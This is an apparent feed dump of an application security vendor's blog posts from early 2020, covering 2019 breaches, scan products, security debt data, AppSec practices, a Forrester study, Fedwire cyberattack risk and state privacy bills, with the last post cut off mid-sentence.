Application Security Research, News, and Education Blog en 6 Noteworthy Data Breaches in 2019 <img src="/sites/default/files/styles/resize_960/public/2020-02/Top%20Breaches.png?itok=XYyp_GDM" width="960" height="480" alt="" typeof="foaf:Image" /><p class="MsoNormal" style="tab-stops:79.85pt">2019 was a banner year for breaches. Some of the biggest victims included social media heavy-hitters Facebook and TikTok, as well as financial dynamo Capital One. They???re just the tip of the iceberg: according to Forbes, over <a href="">3,000 breaches</a> in 2019 tallied up to 4.1 billion compromised data records. That???s a whopping 22.5 million records stolen by cyberattackers every day of last year.</p> <p class="MsoNormal" style="tab-stops:79.85pt">We know from our 10<sup>th</sup> annual&nbsp;<a href="//">State of Software Security</a>&nbsp;(SOSS) report that security debt is a major contributor to the risk of such breaches and attacks. We also learned that those who scan their code for security issues more frequently (300+ times per year) vastly reduce the amount of debt (and risk) they carry. <a href="//">DevSecOps</a> programs that institute more frequent application scanning cadences and break down silos between security and development teams can be a leap forward for organizations like the ones that fell victim to attacks last year.</p> <p class="MsoNormal">As cybersecurity becomes a more complex issue, businesses that handle sensitive data ??? from passwords to Social Security numbers, banking information, and even medical records ??? should take this ever-prevalent problem seriously in 2020 and beyond. Here???s a look at six of the biggest breaches we saw in 2019.</p> <p><embed height="100%" src="//" width="100%"></embed></p> Fri, 14 Feb 2020 16:03:36 -0500 (mmcbee) ver46886 Veracode’s New Scan Type Delivers Results at DevSecOps Speed <img src="/sites/default/files/styles/resize_960/public/2020-02/shutterstock_1091557088-min.png?itok=vxIYHTWF" width="960" height="480" alt="" typeof="foaf:Image" /><p>Across the thousands of customer conversations we have each year, one theme continues to emerge regardless of industry, size, or geography: the pace of development is accelerating rapidly, and the pressure to innovate quickly is more intense than ever before. Veracode???s customers are not alone. A recent <a href="" style="color:#0563c1; text-decoration:underline">GitLab survey</a> across more than 4,000 global developers found that 43 percent of teams now deploy on demand or multiple times a day, and nearly the same percentage, 41 percent, deploy between once a day and once a month.</p> <p>In response to this development evolution, Veracode is evolving as well. Security testing that can???t keep up or, worse, slows developers down, will be under-utilized or ignored in this fast-paced environment. In turn, we???re announcing the latest evolution of our Static Analysis solution ??? in which we???re bringing together two existing scan types and introducing a new, first-of-its-kind scan type. The result is a comprehensive Static Analysis product family that is optimized to integrate security testing into every stage of the development pipeline, giving teams the right scan, at the right time, in the right place.</p> <p style="margin-bottom:11px"><img alt="Veracode's Static Analysis family" data-entity-type="file" data-entity-uuid="5dc40d34-1274-46e9-afca-430cd4c5528a" src="//" /></p> <p><b>IDE Scan </b></p> <p>From the first line of the code, the IDE Scan provides focused, real-time security feedback to developers as they code. This scan, which <i>returns results</i> <i>within seconds</i>, helps developers remediate faster through code examples and reinforces secure coding skills as they work with visual positive reinforcement. Companies using the IDE Scan have reduced flaws introduced into new code by 60 percent.</p> <p><b>Pipeline Scan</b></p> <p><img alt="Results of Veracode Pipeline Scan" data-entity-type="file" data-entity-uuid="eec83a41-836d-4337-97d7-122c49001f86" src="//" /></p> <p>The first-of-its-kind in the market, the new Pipeline Scan runs on every build, providing security feedback on the code at the team level, with a <i>median scan time of 90 seconds</i>. This scan directly embeds into teams??? CI tooling and provides fast feedback on flaws being introduced on new commits. Teams can break the build if policy-violating flaws, based on severity or CWE category, are introduced on a commit or net-new security issues are found. Because this scan is built in line with best-in-class CI tooling, there is no learning curve for development.</p> <p><b>Policy Scan</b></p> <p>Before releasing the software, a Policy Scan completes a full assessment of the code, with an audit trail for compliance purposes, in a <i>median scan time of 8 minutes.</i> This scan evaluates applications against security policy, delivering a clear pass/fail result. Security teams and development managers gain broad visibility across their applications and the continuous feedback they need to proactively improve their overall security posture.</p> <p>Each scan runs on the Veracode Static Analysis Engine, which had&nbsp;a <i>developer</i>-<i>verified false positive rate of less than 1.1 percent </i>across more than 7 million scans in 2019 ??? without manual tuning. Teams benefit from the assurance that they are getting consistent, accurate results alongside clear guidance on what issues to focus on and how to fix them faster, without compromising on development velocity.</p> <p><b>Putting it into practice</b></p> <p>After struggling with a center of excellence approach, the security team at one of our customers, a large telecommunications firm, supported development by providing them access to a variety of different static analysis solutions. While they were empowered by tooling choice, the development team still wasn???t having success remediating risk or scaling the program and was frustrated with inconsistent results.</p> <p>The development team decided to standardize on one solution and, upon completion of a thorough assessment process, selected Veracode. Using a combination of scanning with Veracode Static Analysis across the SDLC, they were able to scale the program to more than 1,300 applications, resolve more than 270,000 security flaws, and reduce the number of new flaws introduced by more than 60 percent ??? all in just 90 days.</p> <p><b>Learn more</b></p> <p>To get more details on Veracode Static Analysis, download our <a href="//">technical whitepaper</a>.</p> <p class="MsoNormal"><span style="mso-bidi-font-family:Arial"><o:p></o:p></span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;tab-stops:<br /> 4.2in"><span style="mso-bidi-font-family:Arial"><o:p></o:p></span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt"><span style="mso-bidi-font-family:Arial"><b style="mso-bidi-font-weight:normal"><o:p></o:p></b></span></p> <p class="MsoNormal">&nbsp;</p> Thu, 13 Feb 2020 09:00:31 -0500 (boshea) ver46676 Veracode Channel Leader Leslie Bois Earns Top Channel Recognition from CRN <img src="/sites/default/files/styles/resize_960/public/2020-02/Leslie%20Bois%20headshot-min.png?itok=jAU63XMJ" width="960" height="480" alt="" typeof="foaf:Image" /><p>Leslie Bois, Veracode???s Vice President of Global Channels and Alliances, has been selected to the esteemed <a href="" style="color:#0563c1; text-decoration:underline"><span style="text-decoration:none"><span style="text-underline:none">CRN 2020 Channel Chiefs list</span></span></a> for the third consecutive year ??? a reflection of the hard work, growth, and influence she???s introduced since joining Veracode in 2017.</p> <p>Bois is responsible for developing and executing Veracode???s global strategy to build a strong partner network, which plays a significant role in the company???s go-to-market efforts. She works cross-functionally to align all aspects of the business to help channel partners grow their client list with Veracode???s platform of leading <a href="" style="color:#0563c1; text-decoration:underline"><span style="text-decoration:none"><span style="text-underline:none">application security</span></span></a> solutions.</p> <p>Under her leadership, Veracode???s channel pipeline has grown exponentially over the past 12 months, and we???re proud to have formed hundreds of partner relationships around the world, including emerging markets such as Asia, Latin America, Europe, and the Middle East. In concurrence with this growth, Veracode is investing significantly in the further development of our global channel initiatives across multiple regions.</p> <p>???I???m honored to receive this recognition from CRN. I think it???s a true testament to the dedication and commitment from Veracode to enable security at the speed of development for companies around the world,??? said Bois. ???The application security market is gaining momentum, and our focus in 2020 will be continuing to ensure that our partners across the globe are positioned to confidently provide the solutions and training businesses need to secure their software. Through dedicated partner engagement, we aim to bring our best-in-class application security platform to more businesses via our channel network.</p> <p>Each of the 2020 Channel Chiefs are the cream of the IT channel crop ??? leaders who drive the channel agenda and evangelize the importance of channel partnerships. Channel Chief honorees are selected by CRN???s editorial staff on the basis of their professional achievements, standing in the industry, dedication to the channel partner community, and strategies for driving future growth and innovation.</p> <p>???The IT channel is undergoing constant evolution to meet customer demands and changing business environments,??? said Bob Skelley, CEO of The Channel Company. ???CRN???s Channel Chiefs work tirelessly, leading the industry forward through superior partner programs and strategies with a focus on helping solution providers transform and grow. Our team here at The Channel Company congratulates these outstanding individuals for their dedication to the channel.???</p> <p>Visit <a href="" style="color:#0563c1; text-decoration:underline"><span style="text-decoration:none"><span style="text-underline:none">here</span></span></a> to find out more about partnering with Veracode.</p> Wed, 12 Feb 2020 09:54:38 -0500 (vlattell) ver46761 What Our Data Reveals About Security Debt <img src="/sites/default/files/styles/resize_960/public/2020-02/Security%20Debt.png?itok=4BEnRYfg" width="960" height="480" alt="" typeof="foaf:Image" /><p>It???s a habitual practice we learn from an early age; keeping track of loans and credit card bills reduces overall debt and makes it easier to bring debt down quickly, avoiding those pesky spikes in interest. That very same practice applies to software security testing. Software is tested, vulnerabilities are revealed, and unaddressed vulnerabilities build up over time as interest in the form of extra work, which compounds into security debt that???s increasingly difficult to reduce the longer you wait.</p> <p>Often, the solution is reprioritizing flaws and improving fix rates to reduce liability over time. In our 10<sup>th</sup> annual <a href="//">State of Software Security</a> (SOSS X) report, we discuss how some of our findings from over 85,000 application scans correlate with mounting security debt???and why you should pay attention.</p> <h4><strong>Debt dwindles with frequent scanning </strong></h4> <p>Just as making consistent payments on your credit card reduces debt over time, a frequent scanning cadence can lower the amount of debt your organization carries. When surveying the findings in our SOSS X report, we saw that frequent scanners (300+) have 5x less debt than infrequent scanners and they see a 3x reduction in median time to remediation (MedianTTR), or the amount of time it takes to fix flaws.</p> <div style="text-align:center"><img alt="Scanning Cadence" data-entity-type="file" data-entity-uuid="cc31d22a-f61a-4225-a2b9-ec9747cda803" src="//" /></div> <h4><strong>Misaligned remediation priorities add to interest </strong></h4> <p>In SOSS X, we talk about how some developers operate on LIFO (Last In, First Out) or FIFO (First In, First Out) methods for fixing flaws. Standard remediation procedures are not one size fits all???what works for your organization may not work for another. But the data we studied shows the likelihood of a flaw being fixed in the first month is only about 22 percent. That number drops down to 10 percent for the second month and 3 to 5 percent as time goes on.</p> <div style="text-align:center"><img alt="Remediation Time" data-entity-type="file" data-entity-uuid="17e120be-988c-48d0-bd16-5ad456d89f5f" src="//" /></div> <p>It???s clear from this data that developers are prioritizing the most recently found flaws above all else. The problem with this process is that it doesn???t take into account what is actually increasing risk. Ultimately, an older Cross-Site Scripting vulnerability is just as dangerous as a more recently discovered one. However, this chart sheds light on the relationship between scanning cadence and security debt; if we???re paying more attention to recently discovered flaws, frequent scanning means additional newer flaws to address. Boosting your scanning cadence and sitting down as a team to figure out your approach to prioritizing flaws can help set you on the right path.&nbsp;</p> <h4><strong>Some industries are more prone to debt than others</strong></h4> <p>Security debt doesn???t discriminate. It shows up in every industry, though some are more likely to accrue debt than others depending on how they prioritize fixes over time, as previously discussed. Data from SOSS X shows us that the Manufacturing and Government/Education industries carry more debt on average than other prominent industries.</p> <div style="text-align:center"><img alt="Security Debt by Industry" data-entity-type="file" data-entity-uuid="ba22b07b-d4c6-4875-a078-da5b5cf48329" height="288" src="//" width="488" /></div> <p>What???s most important to note, though, are the trends over time. For example, we can see that around month four, organizations in Government and Education have an uptick in average fix rates. While Retail doesn???t carry much debt overall, companies tend to remediate the bulk of their flaws by month six or seven and contribute to debt reduction. &nbsp;</p> <p>Security needs vary (capturing quick payment information versus storing robust patient histories and treatment plans, for example), but data from your specific industry will help you keep a pulse on average fix rates for security debt. You and your team can then review this data on a consistent basis when creating long-term plans for eliminating flaws.</p> <h4><strong>PHP and C++ build up debt the fastest</strong></h4> <p>Your plans for fixing flaws and reducing debt should factor in the languages you???re using. Why? The average security debt for PHP and C++ is huge and tends to grow over time, especially when compared to .NET, Android, Java, Android, and JavaScript.</p> <div style="text-align:center"><img alt="Language Flaw Debt" data-entity-type="file" data-entity-uuid="7868b330-a87f-43c7-8b15-462d040b291f" src="//" /></div> <p>Issues with these two languages are the results of simplicity and age: PHP is suited for beginners and is thus susceptible to insecure coding, while C++ is a powerful language that requires some hands-on management of memory and stack control ??? vulnerabilities that are easier to introduce in C++ than in more common languages.</p> <p>It???s difficult for most teams to change the language they???re using at work, but it???s important to keep in mind which languages easily add to security debt. Carrying this awareness and understanding changes in language trends will help you prepare efficient security processes throughout your career.</p> <h4><strong>Cross-Site Scripting carries the heaviest liability for debt</strong></h4> <p>When we look at the layers of flaw percentage by application age, it???s apparent that <a href="//">Cross-Site Scripting</a> (A7-XSS) carries the largest amount of debt across applications. There???s also a slight rise in percentage as we inch closer to the 7-month mark, which tells us that XSS (among others) is a notable contributor to security debt.</p> <div style="text-align:center"><img alt="Cross-site Scripting" data-entity-type="file" data-entity-uuid="721fc440-97f2-4810-ab99-fc281724d80a" src="//" /></div> <p>XSS attacks occur when a malicious script is injected into a webpage and it alters the way that page behaves, opening the site up to damaging security holes open to unwanted activity, like bypassing authentication or stealing sensitive information. This prominent flaw is not picky when it comes to language, either, with notable findings in .NET, iOS, Java, JavaScript, PHP, and Python. Spanning languages with prevalence and risk, XSS is one to keep an eye on as you work towards reducing your security debt.</p> <h4><strong>Read the full SOSS X report</strong></h4> <p>Want more info? Check out our&nbsp;<a href="//">SOSS X page</a>&nbsp;for the full report and&nbsp;additional data to absorb as we head into 2020. You can also listen to our <a href="">podcast series with IDG</a>, in which three of the episodes dig into security debt to drill down on different industries, why security debt grows deeper, and what's behind the buildup of unfixed flaws.&nbsp;</p> <p>&nbsp;</p> Wed, 05 Feb 2020 11:02:34 -0500 (mmcbee) ver45926 Best Practices and Practical Steps to Guide Your AppSec Journey <img src="/sites/default/files/styles/resize_960/public/2020-01/water-and-compass.png?itok=r3wgo4Qy" width="960" height="480" alt="" typeof="foaf:Image" /><p>Imagine that you are tasked with planning a vacation for you and your family. For your ideal trip, you would jet off to a five-star resort on a private island for a month of pampering and fine dining. But, since you have two children, a limited budget, and only one week of paid time off, you settle for a three-star, theme park resort with a spa and outdoor pool. Your family has a great time on the vacation and, using your new-found trip planning skills, you start preparing and saving for your dream getaway.</p> <p>Spearheading an application security (AppSec) program can sometimes feel a little like that type of vacation planning ??? you can see an ideal state, but it can feel unattainable. Just like planning a vacation, creating an AppSec program is also dependent on time and money, as well as an organization???s staff expertise, culture, and executive support.</p> <p>Below, we look at both the best practices, and some practical first steps you can take that will prepare your AppSec program for improvements in the future. In other words, keep your eye on the private island AppSec, while moving forward with the theme park AppSec.</p> <h4><strong>Best Practice #1:</strong> <strong><em>Use More Than One Application Security Testing Type</em></strong></h4> <p style="margin-left:.5in;">When you visit the doctor with an ailment, you undergo several tests to determine the diagnosis. There is no magic test that detects all illnesses. The same goes for AppSec tests ??? there is no one test that detects every vulnerability. So, to make sure that your application is fully secure, the best practice is to use <a href="">as many testing types</a> as possible.</p> <h4><strong>Practical Advice:</strong> <strong><em>Start with What Makes the Most Sense, Then Add More Later</em></strong></h4> <p style="margin-left:.5in;">Develop an AppSec strategy to determine where you need AppSec solutions the most. Start by implementing the tests that will have the most impact, in the shortest amount of time, for the least amount of money. From there, you can start adding on more tests.</p> <p style="margin-left:.5in;">There are several factors that will help determine which tests will have the most impact. For example, if you have multiple applications, rank the applications based on the criticality of their risks, and test the applications with the most critical risks first. Another thing to consider is programming languages. If you leverage less-mainstream programming languages, there are limitations regarding the AppSec tests you can use. So start with tests that are not specific to language, like dynamic or penetration testing.</p> <h4><strong>Best Practice #2: </strong><strong><em>Shift Security Left</em></strong></h4> <p style="margin-left:.5in;">In today???s fast-paced world, enterprises are moving from yearly product releases to monthly, weekly, or daily releases. To keep up with this change, security testing needs to be woven <em>into</em> the development cycle instead of <em>after</em> the development cycle. That way, when it is time to release the product, security testing will not stand in the way.</p> <h4><strong>Practical Advice: </strong><strong><em>Shift Security Culture Left</em></strong></h4> <p style="margin-left:.5in;">Moving security testing into the development cycle means that developers will play a bigger security role. Since most development and security teams have never worked together, ???shifting security left??? can be a significant cultural change.</p> <p style="margin-left:.5in;">Before making this change, a good first step is to help security understand how development works and to <a href="">build a relationship</a>. Understanding how development works involves learning their tools and process, as well as how they build software, so that security testing can be integrated organically. When security is organically weaved into the development process, developers are more likely to be receptive of security, making it easier to forge trusting relationships.</p> <p style="margin-left:.5in;">You should also look for ways to automate security testing into the CI/CD pipeline. By integrating automated security tools into the CI/CD pipeline, you can incorporate testing without handing off code to another team, making it easier for developers to fix issues immediately.</p> <h4><strong>Best Practice #3: </strong><strong><em>Fix Everything Fast</em></strong></h4> <p style="margin-left:.5in;">Finding vulnerabilities is only half of the battle. You need to have a solid plan in place to fix them once they are discovered. Automating security testing in CI/CD pipelines allows organizations to not only find flaws faster, but it also speeds up the remediation process.</p> <h4><strong>Practical Advice: </strong><strong><em>Prioritize Fixes While Creating Fewer Vulnerabilities</em></strong></h4> <p style="margin-left:.5in;">As much as we would love to fix all flaws instantaneously, it is not possible. A practical first step in remediation is <a href="//">prioritizing</a>. When prioritizing your flaws, do not just concentrate on defect severity, also consider the criticality of the application and how easy it would be to exploit the flaw.</p> <h4><strong>Best Practice #4: </strong><strong><em>Embed Security Champions into Development Teams</em></strong></h4> <p style="margin-left:.5in;">Most developers do not have a security background. This makes it very challenging when you try to implement security tests in the development lifecycle. A way to help fill this knowledge gap is to select interested volunteers from the development teams to become <a href="//">security champions</a>. Security champions learn about security testing and can reiterate important security messages back to their teams.</p> <h4><strong>Practical Advice: </strong><strong><em>Build Up Your Security Champions Capabilities</em></strong></h4> <p style="margin-left:.5in;">Building a team of security champions takes time. Start by making sure your organization???s security, development, and leadership teams are all on board with the security champions concept. Once everyone agrees with the idea, help the security and development teams build a relationship. If developers and security personnel are on good terms, you have a much better chance of developers agreeing to become security champions.</p> <p style="margin-left:.5in;">Next, identify your champions. Security champions should be selected based on a demonstrated or perceived interest in learning more about security. If you select developers who do not have an interest in security, there is a high probably that they will not be successful in the role. Lastly, nurture your identified champions by giving them the appropriate tools and support, like additional training in security concepts and code reviews, needed for success.</p> <h4><strong>Best Practice #5: </strong><strong><em>Measure Your AppSec Results</em></strong></h4> <p style="margin-left:.5in;">It???s critical to be able to measure and report on the success of an AppSec program in metrics. Identify which metrics are most important to your organization???s key decision-makers, then display the metrics in an easy-to-understand, actionable manner.</p> <h4><strong>Practical Advice: </strong><strong><em>Focus on Your Policy Metric</em></strong></h4> <p style="margin-left:.5in;">Bringing too many metrics to your executives early on can be overwhelming and, quite frankly, unnecessary. Start by presenting one metric: how your AppSec program is complying with your internal AppSec policy. From here, you can start sharing other valuable metrics.</p> <p>Remember, just like saving for your dream getaway, creating the perfect AppSec program takes time. But taking practical steps and looking toward the big picture will help you get closer to perfect sooner.</p> <p>Learn more about the steps you can take to achieve AppSec maturity in our recent guide, <a href=""><em>Application Security Best Practices vs. Practicalities: What to Strive for and Where to Start</em>.</a></p> Fri, 31 Jan 2020 10:00:02 -0500 (hgoslin) ver45921 What Software Composition Analysis and Your Dentist Have in Common <img src="/sites/default/files/styles/resize_960/public/2020-01/dentist-min.png?itok=09BgUosf" width="960" height="480" alt="" typeof="foaf:Image" /><p>SAST, DAST, IAST, SCA ??ヲ confused about the differences? We thought it might be helpful to clear things up by using the analogy of human health. When you visit the doctor with an ailment, or even for a routine checkup, you are likely to undergo a series of tests to find potential health conditions or diseases. Since the tests are targeting different parts of the mind or body, the results may vary. So, the more tests performed, the better the chances of discovering and treating an illness. The same logic applies to security health. The more application security tests performed, the better the odds are that you will find and remediate security flaws or vulnerabilities.</p> <p>Now that we understand the importance of the application security tests, and we know that they are looking for different vulnerabilities and flaws, how can we distinguish between them? We will continue with the human health analogy, comparing AppSec tests to common, easy-to-understand health tests.</p> <h4><strong>Static analysis</strong></h4> <p>Make no bones about it, static analysis is very similar to an X-ray. Just like X-rays, which produce a static image to find torn and broken bones, static analysis evaluates an application from the inside out, reviewing stationary code for security vulnerabilities. By catching the vulnerabilities before running the application, developers can fix flaws in a timely, cost-efficient manner.</p> <h4><strong>Dynamic analysis</strong></h4> <p>Dynamic analysis is comparable to a reflex test. During a reflex test, the doctor taps a tendon to make sure that the patient???s motor and sensory skills are intact. Dynamic analysis leverages a similar outside-in approach, poking and prodding at the running application to analyze vulnerabilities.</p> <h4><strong>Software composition analysis</strong></h4> <p>For software composition analysis (SCA), you can think of a dental exam. During a dental exam, if you have cavities, your fillings are inspected. Although fillings are not an organic part of the body, if undetected and untreated, faulty dental fillings can lead to serious illness. This concept is a lot like software composition analysis. SCA inspects open source code for vulnerabilities. This is code that you didn't write yourself, but it's still affects the security and the health of the application. Despite the fact that open source is a third-party component, if vulnerabilities go undetected, it is nothing to smile about.</p> <h4><strong>Interactive analysis </strong></h4> <p>Interactive analysis can best be compared to an Electrocardiography (EKG) exam. An EKG is when a doctor puts electrodes on your chest to measure your heart rate. The doctor might have you exercise while conducting the EKG to evaluate your heart under stress. With interactive analysis, you place an agent in the runtime environment and put the application under load. From there, you can see what vulnerabilities the agent discovers.</p> <h4><strong>Penetration test</strong></h4> <p>A penetration test is the equivalent of a doctor???s personal assessment. When you visit the doctor and convey your symptoms, the doctor uses their expertise to provide a diagnosis. It is not unusual for the doctor to pick up on an illness that is undetectable by an exam. Similarly, with a penetration exam, an expert penetration tester simulates a security attack on the application to find vulnerabilities often undetectable by other, more automated methods.</p> <p>So, the next time you visit the doctor and undergo several tests, remember that each test holds a purpose. And when it is time to evaluate your AppSec program, remember that the same logic holds true. The more security tests you are able to perform, the better the chances of catching vulnerabilities.</p> <h4><strong>Learn More</strong></h4> <p>Get more details on the strengths and weaknesses of the different AppSec testing types in our recent guide, <a href=""><em>Application Security Best Practices vs. Practicalities: What to Strive for and Where to Start</em>.</a></p> Wed, 29 Jan 2020 09:56:01 -0500 (hgoslin) ver45916 Forrester Study on the Benefits of Cloud vs. On-Premises AppSec <img src="/sites/default/files/styles/resize_960/public/2020-01/clouds-min.png?itok=GPgd8occ" width="960" height="480" alt="" typeof="foaf:Image" /><p>Veracode recently commissioned Forrester Consulting to conduct research on the Total Economic Impact??「 of using a cloud-based application security (AppSec) solution versus an on-premises solution. To collect information on the benefits and risks associated with the solutions, Forrester interviewed four customers who have used Veracode as well as a variety of on-premises application security solutions. The data presented four business benefits and average cost savings associated with using SaaS-based AppSec:</p> <h4 style="margin-left: 0.5in;"><strong>Improved speed to scale saves 200 hours, annually </strong></h4> <p style="margin-left:.5in;">On average, it takes approximately 33 hours to set up an AppSec server and 216 hours for annual maintenance. By using a cloud-based solution, like Veracode, organizations avoid server costs, which improves speed to scale and saves more than $1.3 million over three years.</p> <h4 style="margin-left: 0.5in;"><strong>Faster time to market leads to additional $888,000 in annual profit &nbsp;</strong></h4> <p style="margin-left:.5in;">Veracode Greenlight is a unique tool that performs security scans as developers are coding. By catching flaws during development, code is updated faster, and products and updates are typically released three months sooner than if conducting post-deployment scans. Gaining an additional three months of profit on every application could translate to millions saved over the course of a few years.</p> <h4 style="margin-left: 0.5in;"><strong>Annual legacy application costs of $1.86 million are avoided</strong></h4> <p style="margin-left:.5in;">The study found that Veracode costs 20 percent less to operate than on-premises solutions. This means that by moving all legacy applications to a cloud-based solution, an organization would have lower operating costs, which could save ??? on average ??? almost $3.9 million over the course of three years.</p> <h4 style="margin-left: 0.5in;"><strong>Real-time flaw identification saves $4.4 million over three years</strong></h4> <p style="margin-left:.5in;">Veracode Greenlight not only leads to increased profits, it also leads to increased productivity for developers. Since they are able to see flaws while coding, they can make real-time edits, eliminating rework down the line. And the more productive developers are when eliminating flaws, the more productive the security teams are. This could lead to an average productivity savings of approximately $4.4 million over three years.</p> <p>Download the full study, <em><a href="">SaaS vs. On-premises: The Total Economic Impact??「 of Veracode???s SaaS-based Application Security Platform</a></em>, for a detailed analysis of cost savings and business benefits. In the report, you will also find additional baseline benefits attributed to using Veracode, as well as a comprehensive overview of the platform.</p> Mon, 27 Jan 2020 11:04:59 -0500 (hgoslin) ver45826 Forrester Analysis on the State of Government Application Security: Government Must Make Significant Advances <img src="/sites/default/files/styles/resize_960/public/2020-01/government-min.png?itok=34kdg1kk" width="960" height="480" alt="" typeof="foaf:Image" /><p>In a recent report, <a href=""><em>The State of Government Application Security, 2020</em></a>, Forrester analysts establish that governments are far behind other industries in critical areas of application protection. This finding ??? backed by the Forrester Analytics Global Business Technographicsツョ Security Survey, 2019 ??? is especially alarming given the amount of sensitive citizen data housed by government agencies. And, since applications are currently the most common form of breaches, governments need to start investing heavily in application security (AppSec).</p> <p>For starters, government agencies need to implement prerelease scans to reduce the remediation time of security flaws. By implementing prerelease scans, like static analysis, flaws can be detected earlier in the development lifecycle. But it is not just a matter of implementing <em>occasional</em> prerelease scans. According to Veracode???s <a href=""><em>State of Software Security Industry Snapshot</em></a>, government agencies currently scan 90 percent of their applications 12 times a year, which equates to only once a month. Government agencies need to formulate an AppSec program with a regular cadence of <em>frequent</em> scans. Industries that scan applications more frequently find and remediate flaws faster and, as a result, have less security debt.</p> <p>It is also important that governments embrace DevSecOps practices. DevSecOps is a methodology that introduces collaboration between development, operations, and security. Part of the collaboration involves shifting security to the beginning of the development process. This concept helps save time because security flaws and vulnerabilities are recognized and addressed prior to deployment. But embracing DevSecOps is not just about adding manual prerelease scans, it is about properly <em>implementing </em>prerelease tools. Here are three things to consider:</p> <ul> <li>Prepare a business case for prerelease testing of applications that is centered around citizen trust. Make the case for adopting dynamic, static, and software composition analysis based on increasing citizen trust and improving citizen experience. A data breach is a surefire way to erode citizen trust.</li> <li>Automate prerelease scans whenever possible and integrate the scans with build tools like Jenkins or ticketing tools like Jira. Automation and integrations help you recognize the benefits of AppSec tests and speed up the remediation process.</li> <li>Scan both in-house applications as well as third-party applications. If you neglect to scan third-party applications, an unidentified flaw could compromise your data and negatively affect your customer experience.</li> </ul> <p>Although government agencies are currently falling behind with these vital security measures, with the right products and a little guidance, governments can be caught up in no time. Read the full <a href="">Forrester report</a> for details on the state of AppSec in government agencies.</p> Fri, 24 Jan 2020 10:56:07 -0500 (hgoslin) ver45821 Report: A Cyberattack Could Severely Disrupt the US Financial System <img src="/sites/default/files/styles/resize_960/public/2020-01/Cyberattack-Bank-Information.png?itok=YqfnZtIG" width="960" height="480" alt="" typeof="foaf:Image" /><p>A new staff report from the Federal Reserve Bank of New York highlights the risk and potential fallout that a sophisticated cyberattack might have on the United States. <a href="">In the report</a>, analysts examined a scenario in which a single-day shock hits the country???s payment network, Fedwire, measuring the broad impact it would have on the economy. The results? A significant 38 percent of the network would be affected on average by significant spillovers to other banks, damaging the stability of the broader financial system in the United States.</p> <h4><strong>How an attack might unfold</strong></h4> <p>According to the analysts, this hypothetical situation would unfold swiftly. It begins with a cyberattack that allows financial institutions to continue receiving payments but prevents them from sending any payments throughout the operating day. In this scenario, because payments are actualized when Fedwire receives requests from senders, an institution???s balance in the system immediately reflects those changes???yet the targeted financial institution is unable to interact with Fedwire, causing a backup in the system. Essentially, impacted banks would become black holes that absorb liquidity without distributing any money.</p> <p>Timing matters too and can magnify the impacts of a breach. ???Attacks on seasonal days associated with greater payment activity are more disruptive relative to non-seasonal days, with average impacts that are about 13 percent greater,??? the report says. ???We estimate that, on average, attacking on the worst date for a particular large institution adds an additional 25 percent in impairment relative to the case of no specific knowledge.???</p> <h4><strong>The domino effect of liquidity hoarding</strong></h4> <p>An important point to consider from this analysis is that the consequence of hoarding cash and forgoing payments during a breach can worsen the situation. The report explains, ???We find that liquidity hoarding amplifies the network impact of the cyberattack, both increasing the average impact on the system and increasing the maximal risk.??? As banks are not necessarily perceptive of daily liquidity conditions because they have ample reserves on hand, they likely will not react to these irregularities very quickly. Thus, all institutions other than the one impacted by a breach will continue to make payments as usual, resulting in substantial interruptions in the network.</p> <p>It???s a domino effect that could shake up the whole system. Analysts uncovered a correlation between assets and payments over 80 percent, finding that a smaller subset of banks plays a vital role in markets like equity and Treasury. A cyberattack on a single institution could impede the day-to-day functions of the payment network and cause quite a headache that extends beyond the impacted institutions, reaching into the economy.</p> <p>Failing to respond to these issues strategically as they unfold can lead to that previously mentioned black hole of liquidity. This problem may be worsened if financial institutions use the same third-party service providers, which offers less incentive for banks to monitor activity and spot abnormalities that can cause liquidity interruptions.</p> <h4><strong>Strengthening security for financial institutions</strong></h4> <p>Considering the above scenario, data from our most recent <a href=""><em>State of Software Security</em> report</a> (SOSS) indicates that the financial industry has some work to do to shore up its application security. The figures reveal that, in the financial industry specifically, the median time to remediate security flaws in code (MedianTTR) is 67 days, which is higher than nearly every other industry we measured. Information leakage also has a high prevalence at 66 percent as opposed to 63 percent across all industries.</p> <p>Our data uncovers best practices that are dramatically improving remediation times and reducing overall <a href="">security debt</a>. The analysis for this year???s report found that when organizations scan their applications for security more than 260 times per year their median fix time drops from 68 days to 19 days???a 72% reduction.</p> <p>Get more details on the application security trends and best practices in the full <a href="//">SOSS report</a>.</p> <p>&nbsp;</p> Tue, 21 Jan 2020 10:25:38 -0500 (mmcbee) ver45856 2020 Trend Alert: Consumer Privacy <img src="/sites/default/files/styles/resize_960/public/consumer%20privacy-min.png?itok=YjigXary" width="960" height="480" alt="Consumer privacy " typeof="foaf:Image" /><p>We are only a few weeks into 2020, and it is safe to say that consumer privacy is <em>all the rage</em>. California kicked off the movement with the California Consumer Privacy Act (CCPA), AB 375, which went into effect on January 1, 2020. The act aims to give consumers more rights to their personal data. Since then, Washington, New Hampshire, and New York have all proposed similar consumer privacy bills that ??? if passed ??? will have an effect not only on consumers, but on also on businesses that operate in these states.</p> <p>Take a look at the bills, then consider the steps your business can take to help comply with the regulations.</p> <h4><strong>California Consumer Privacy Act </strong></h4> <p>The <a href="">newly established rights</a> allow consumers to request records of what personal data is collected and mandate the deletion or cease the sale of that information. The privacy act also regulates the data collected from minors and prevents businesses from discriminating against consumers that choose to exercise their rights.</p> <p>Businesses that must adhere to the CCPA are those that collect personal data, conduct business in California, and fit into one or more of the following categories:</p> <ul> <li>Gross annual revenue over $25 million</li> <li>Buys, sells, or obtains the personal data of more than 50,000 consumers, devices, or households</li> <li>Makes over 50 percent of its revenue from selling consumers??? data.&nbsp;</li> </ul> <p>To further empower consumers, CCPA has also mandated data brokers to register with the Attorney General, providing information about who they are and what their collection practices entail. This information is loaded into a database and is accessible to all consumers.&nbsp;</p> <h4><strong>Washington Privacy Act </strong></h4> <p>On January 13, 2020, Washington State Senator, Reuven Carlyle, introduced the bill for the <a href="">Washington Privacy Act</a> (WPA), SB 5376. If granted, the bill will allow residents to see who is accessing their personal data, correct or delete data, or opt-out of targeted advertisements and profiling. Controllers will need to conduct data protection assessments regarding where they are processing personal data and additional assessments anytime there is a change to the processing that could affect consumers. The bill will also require companies to disclose data management policies to increase transparency and establish limits on the use of facial recognition technology.</p> <h4><strong>New Hampshire Privacy Act </strong></h4> <p>Garrett Muscatel and Greg Indruk, U.S. State Representatives, reintroduced the bill for the <a href=";txtFormat=html&amp;sy=2020">Act Relative to the Collection of Personal Information by Businesses</a>, HB 1680, to the New Hampshire House of Representatives. The bill, if passed, will 